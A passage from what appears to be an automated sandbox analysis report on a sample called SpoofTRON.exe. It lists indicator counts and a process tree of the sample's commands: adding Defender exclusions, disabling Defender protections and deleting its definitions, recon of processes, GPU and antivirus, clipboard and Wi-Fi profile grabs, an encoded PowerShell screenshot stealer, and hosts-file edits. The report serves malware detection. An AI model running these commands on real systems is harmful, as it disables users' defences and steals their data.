pid Process 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2780 winrar-x64-701.exe 2780 winrar-x64-701.exe 2780 winrar-x64-701.exe 5780 winrar-x64-701.exe 5780 winrar-x64-701.exe 5780 winrar-x64-701.exe 2528 7z2408-x64.exe 2440 OpenWith.exe 916 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3552 wrote to memory of 2000 3552 SpoofTRON.exe 77 PID 3552 wrote to memory of 2000 3552 SpoofTRON.exe 77 PID 2000 wrote to memory of 560 2000 SpoofTRON.exe 78 PID 2000 wrote to memory of 560 2000 SpoofTRON.exe 78 PID 2000 wrote to memory of 4728 2000 SpoofTRON.exe 79 PID 2000 wrote to memory of 4728 2000 SpoofTRON.exe 79 PID 2000 wrote to memory of 3120 2000 SpoofTRON.exe 80 PID 2000 wrote to memory of 3120 2000 SpoofTRON.exe 80 PID 2000 wrote to memory of 3088 2000 SpoofTRON.exe 84 PID 2000 wrote to memory of 3088 2000 SpoofTRON.exe 84 PID 2000 wrote to memory of 3596 2000 SpoofTRON.exe 86 PID 2000 wrote to memory of 3596 2000 SpoofTRON.exe 86 PID 3088 wrote to memory of 1492 3088 cmd.exe 88 PID 3088 wrote to memory of 1492 3088 cmd.exe 88 PID 560 wrote to memory of 3972 560 cmd.exe 89 PID 560 wrote to memory of 3972 560 cmd.exe 89 PID 4728 wrote to memory of 4004 4728 cmd.exe 90 PID 4728 wrote to memory of 4004 4728 cmd.exe 90 PID 3120 wrote to memory of 2456 3120 cmd.exe 91 PID 3120 wrote to memory of 2456 3120 cmd.exe 91 PID 3596 wrote to memory of 2196 3596 cmd.exe 92 PID 3596 wrote to memory of 2196 3596 cmd.exe 92 PID 2000 wrote to memory of 4624 2000 SpoofTRON.exe 94 PID 2000 wrote to memory of 4624 2000 SpoofTRON.exe 94 PID 4624 wrote to memory of 4940 4624 cmd.exe 96 PID 4624 wrote to memory of 4940 4624 cmd.exe 96 PID 2000 wrote to memory of 3624 2000 SpoofTRON.exe 97 PID 2000 wrote to memory of 3624 2000 SpoofTRON.exe 97 PID 3624 wrote to memory of 3512 3624 cmd.exe 99 PID 3624 wrote to memory of 3512 3624 cmd.exe 99 PID 2000 wrote to memory of 4240 2000 SpoofTRON.exe 143 PID 2000 wrote to memory of 4240 2000 SpoofTRON.exe 143 PID 4240 wrote to memory of 3056 4240 cmd.exe 102 PID 4240 wrote to memory of 3056 4240 cmd.exe 102 PID 2000 wrote to memory of 4848 2000 SpoofTRON.exe 145 PID 2000 wrote to memory of 4848 2000 SpoofTRON.exe 145 PID 4848 wrote to memory of 4464 4848 cmd.exe 105 PID 4848 wrote to memory of 4464 4848 cmd.exe 105 PID 2000 wrote to memory of 1840 2000 SpoofTRON.exe 106 PID 2000 wrote to memory of 1840 2000 SpoofTRON.exe 106 PID 1840 wrote to memory of 860 1840 cmd.exe 108 PID 1840 wrote to memory of 860 1840 cmd.exe 108 PID 2000 wrote to memory of 3104 2000 SpoofTRON.exe 109 PID 2000 wrote to memory of 3104 2000 SpoofTRON.exe 109 PID 2000 wrote to memory of 5092 2000 SpoofTRON.exe 110 PID 2000 wrote to memory of 5092 2000 SpoofTRON.exe 110 PID 2000 wrote to memory of 1576 2000 SpoofTRON.exe 113 PID 2000 wrote to memory of 1576 2000 SpoofTRON.exe 113 PID 2000 wrote to memory of 2180 2000 SpoofTRON.exe 115 PID 2000 wrote to memory of 2180 2000 SpoofTRON.exe 115 PID 2000 wrote to memory of 4688 2000 SpoofTRON.exe 116 PID 2000 wrote to memory of 4688 2000 SpoofTRON.exe 116 PID 5092 wrote to memory of 3764 5092 cmd.exe 119 PID 5092 wrote to memory of 3764 5092 cmd.exe 119 PID 3104 wrote to memory of 1776 3104 cmd.exe 120 PID 3104 wrote to memory of 1776 3104 cmd.exe 120 PID 1576 wrote to memory of 3860 1576 cmd.exe 121 PID 1576 wrote to memory of 3860 1576 cmd.exe 121 PID 2180 wrote to memory of 3840 2180 cmd.exe 122 PID 2180 wrote to memory of 3840 2180 cmd.exe 122 PID 4688 wrote to memory of 4820 4688 cmd.exe 123 PID 4688 wrote to memory of 4820 4688 cmd.exe 123 PID 2000 wrote to memory of 4604 2000 SpoofTRON.exe 124 PID 2000 wrote to memory of 4604 2000 SpoofTRON.exe 124 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4240 attrib.exe 3364 attrib.exe 3740 attrib.exe 4420 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe"C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe"C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SPOOFtron\SpoofTRON.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Wait 5 Seconds then Install Driver', 0, 'WinWare', 16+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Wait 5 Seconds then Install Driver', 0, 'WinWare', 16+16);close()"4⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4604
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:964 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4468
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:456
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pyrqtzzg\pyrqtzzg.cmdline"5⤵PID:3424
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BE4.tmp" "c:\Users\Admin\AppData\Local\Temp\pyrqtzzg\CSCAFFB9F428A254F19B15413369677E329.TMP"6⤵PID:3632
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3000
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2156
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4848
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5060
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4456
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
